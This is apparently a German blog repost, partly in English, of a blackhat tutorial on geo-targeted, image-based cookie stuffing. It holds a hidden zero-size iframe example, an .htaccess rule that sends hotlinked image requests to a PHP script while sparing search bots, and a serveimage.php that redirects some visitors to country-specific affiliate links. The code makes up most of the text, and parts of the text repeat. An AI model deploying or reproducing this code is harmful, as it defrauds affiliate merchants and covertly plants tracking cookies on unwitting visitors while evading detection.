Geo-targeted Bilder basiertes Cookie Stuffing, meine Güte, was der digerti marketing blackhat sich alles einfallen lässt.
Digerati Marketing » Geo-Targeted Image Based Cookie Stuffing
Cookie Stuffing Techniken
iframes
Beispiel
<iframe src="http://www.cookiebasiertespartnerprogramm.com" style="border:0px #FFFFFF none;" name="dieweltistschoen" scrolling="auto" frameborder="0" align=aus marginheight="0px" marginwidth="0px" height="0" width="0"></iframe>
Diese Technik ist also ganz einfach, aber auch um so leichter zu entdecken.
Geo-targeting cookie stuffing
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.
The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.
Cookie stuffing mit Bildern & PHP
Nun paassen wir Image Requests in der serveimage.php Datei wie folgt an:
Dieser PHP Code wird nun die Hotlinker verhindern und bei zu 10% affiliate cookies für das IP-Land des Besuchers und zu 90% korrekt das Bild ausliefern.
Bei country codes two letter three letter and numerical abbreviations bekommt man eine Country Code liste, die man entsprechend im obigen PHP Code berücksichtigen kann.
Andere Sicherheitsmaßnahmen um das Entdecken zu verhindern
Digerati Marketing » Geo-Targeted Image Based Cookie Stuffing
Digerati Marketing » Geo-Targeted Image Based Cookie Stuffing
Cookie Stuffing Techniken
iframes
Beispiel
<iframe src="http://www.cookiebasiertespartnerprogramm.com" style="border:0px #FFFFFF none;" name="dieweltistschoen" scrolling="auto" frameborder="0" align=aus marginheight="0px" marginwidth="0px" height="0" width="0"></iframe>
Diese Technik ist also ganz einfach, aber auch um so leichter zu entdecken.
Geo-targeting cookie stuffing
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.
The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.
Code:
Options +FollowSymLinks
RewriteEngine on
# Let's not cookie stuff our own visitors!
RewriteCond %{HTTP_REFERER} !^$ [NC]
# If the request is outside of your site
RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]
# If the request is not from a few bots (pretty basic, add to this!)
RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]
# Grab the image name, extension type, go to our serveimage.php file
RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]
Cookie stuffing mit Bildern & PHP
Nun paassen wir Image Requests in der serveimage.php Datei wie folgt an:
Code:
<?php
//Get the image name from request
$ext = $_GET['ext'];
$path = "http://webroyals.net/forum/images/".$_GET['img'].".".$_GET['ext'];
// Decide if we should stuff our lucky visitor with a cookie
//Let's generate a random number
$rand = mt_rand(0, 1000);
// See if it is a lucky request
// You can change percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image
if ($rand<100) { cookie_stuff(); } else {spit_it_out($ext,$path);}
//Functions
// Forget it - serve them an image!
function spit_it_out($ext, $path) {
header("Cache-Control: no-cache");
header("Pragma: no-cache");
if ($ext=='jpeg'|$ext=='jpg') {
header("Content-type: image/jpeg");
} else if ($ext=='gif') {
header("Content-type: image/gif");
} else if ($ext=='bmp') {
header("Content-type: image/bmp");
} else {
header("Content-type: image/png");
}
readfile('http://'.$_SERVER["SERVER_NAME"].'/'.$path) or die("error!");
exit;
}
// We have a winner! Stuff a cookie
function cookie_stuff() {
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($ip)) {
// Work out what country they are in
$country = file_get_contents("http://api.hostip.info/country.php?ip=$ip"); } else {$country="US";}
if ($country=="UK") {
header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
}
elseif ($country=="CA") {
header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
}
else {
header('Location: YOUR-USA-AFFILIATE-LINK'); //US
// Add as many countries as you want: http://www.worldatlas.com/aatlas/ctycodes.htm
}
}
?>
Dieser PHP Code wird nun die Hotlinker verhindern und bei zu 10% affiliate cookies für das IP-Land des Besuchers und zu 90% korrekt das Bild ausliefern.
Bei country codes two letter three letter and numerical abbreviations bekommt man eine Country Code liste, die man entsprechend im obigen PHP Code berücksichtigen kann.
Andere Sicherheitsmaßnahmen um das Entdecken zu verhindern
Digerati Marketing » Geo-Targeted Image Based Cookie Stuffing